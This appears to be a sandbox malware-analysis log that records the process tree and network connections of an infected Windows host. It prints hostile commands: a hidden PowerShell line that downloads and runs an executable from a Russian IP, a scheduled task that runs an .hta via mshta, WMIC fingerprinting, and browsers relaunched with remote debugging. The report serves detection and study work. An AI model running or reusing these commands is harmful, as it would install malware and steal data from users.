"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3000 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4852 /prefetch:2

C:\Windows\TEMP\{F406E3B2-8A83-4A2A-9DD3-A54B5AB56345}\.cr\z3SJkC5.exe

"C:\Windows\TEMP\{F406E3B2-8A83-4A2A-9DD3-A54B5AB56345}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10096990101\z3SJkC5.exe" -burn.filehandle.attached=764 -burn.filehandle.self=576

C:\Windows\TEMP\{34171AE3-3FDE-44B4-A45A-635DFB75D5E7}\.ba\WiseTurbo.exe

C:\Windows\TEMP\{34171AE3-3FDE-44B4-A45A-635DFB75D5E7}\.ba\WiseTurbo.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 6748 -ip 6748

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get ProcessorId

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6748 -s 832

C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe

C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6748 -ip 6748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6748 -s 760

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC BIOS GET SERIALNUMBER"

C:\Windows\System32\Wbem\WMIC.exe

WMIC BIOS GET SERIALNUMBER

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\Temp\10097000101\8jQumY5.exe

"C:\Users\Admin\AppData\Local\Temp\10097000101\8jQumY5.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC COMPUTERSYSTEM GET MODEL"

C:\Windows\System32\Wbem\WMIC.exe

WMIC COMPUTERSYSTEM GET MODEL

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "y7BNMma8Q6u" /tr "mshta \"C:\Temp\OlAu2JEes.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC COMPUTERSYSTEM GET MANUFACTURER"

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\OlAu2JEes.hta"

C:\Windows\System32\Wbem\WMIC.exe

WMIC COMPUTERSYSTEM GET MANUFACTURER

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10097010101\BXxKvLN.exe

"C:\Users\Admin\AppData\Local\Temp\10097010101\BXxKvLN.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10097020101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10097020101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10097020101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10097020101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 8964 -ip 8964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8964 -s 964

C:\Users\Admin\AppData\Local\Temp\10097030101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10097030101\zY9sqWs.exe"

C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe

C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe

C:\Users\Admin\AppData\Local\Temp\10097040101\JCFx2xj.exe

"C:\Users\Admin\AppData\Local\Temp\10097040101\JCFx2xj.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8543046f8,0x7ff854304708,0x7ff854304718

C:\Users\Admin\AppData\Local\Temp\10097050101\4klgwMz.exe

"C:\Users\Admin\AppData\Local\Temp\10097050101\4klgwMz.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3004 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3132 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2976 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3996 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4116 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3740 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,6929558647432096673,7249083047389085828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2788 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff86b14cc40,0x7ff86b14cc4c,0x7ff86b14cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2276,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2264 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1808,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2304 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2004,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2416 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3212 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3252 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4492,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4548 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4520,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4532 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4512 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4224,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4504 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10097060101\W6ySCZP.exe

"C:\Users\Admin\AppData\Local\Temp\10097060101\W6ySCZP.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4796,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4908 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10097070101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10097070101\v6Oqdnc.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4232,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4976 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5300,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5248,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5340 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5484,i,5992202089893723870,2952334823354665410,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5488 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8543046f8,0x7ff854304708,0x7ff854304718

Network

Country Destination Domain Proto
US 8.8.8.8:53 calmingtefxtures.run udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 boltetuurked.digital udp
US 8.8.8.8:53 pastedeputten.life udp
RU 176.113.115.6:80 176.113.115.6 tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 explorebieology.run udp
US 104.21.31.208:443 explorebieology.run tcp
US 104.21.31.208:443 explorebieology.run tcp
US 104.21.31.208:443 explorebieology.run tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 104.21.31.208:443 explorebieology.run tcp
US 8.8.8.8:53 su.t.goldenloafuae.com udp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 8.8.8.8:53 e5.o.lencr.org udp
GB 104.86.110.232:80 e5.o.lencr.org tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 104.21.31.208:443 explorebieology.run tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 104.21.31.208:443 explorebieology.run tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 135.181.76.95:80 135.181.76.95 tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 172.67.212.102:443 codxefusion.top tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.206:443 clients2.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 142.250.179.225:443 clients2.googleusercontent.com udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 172.217.16.234:443 ogads-pa.googleapis.com udp
GB 216.58.201.110:443 apis.google.com udp
GB 172.217.16.234:443 ogads-pa.googleapis.com tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.46:443 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
GB 142.250.200.46:443 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
N/A 224.0.0.251:5353 udp
US 172.67.212.102:443 codxefusion.top tcp
US 8.8.8.8:53 www.dropbox.com udp
GB 162.125.64.18:443 www.dropbox.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.65.92:443 nw-umwatson.events.data.microsoft.com tcp
US 20.42.65.92:443 nw-umwatson.events.data.microsoft.com tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 13.89.179.12:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
FR 45.155.103.183:1488 tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
N/A 127.0.0.1:57725 tcp
N/A 127.0.0.1:9223 tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 13.89.179.12:443 nw-umwatson.events.data.microsoft.com tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 52.168.117.173:443 nw-umwatson.events.data.microsoft.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 piaktrip.online udp
US 104.21.40.182:443 piaktrip.online tcp
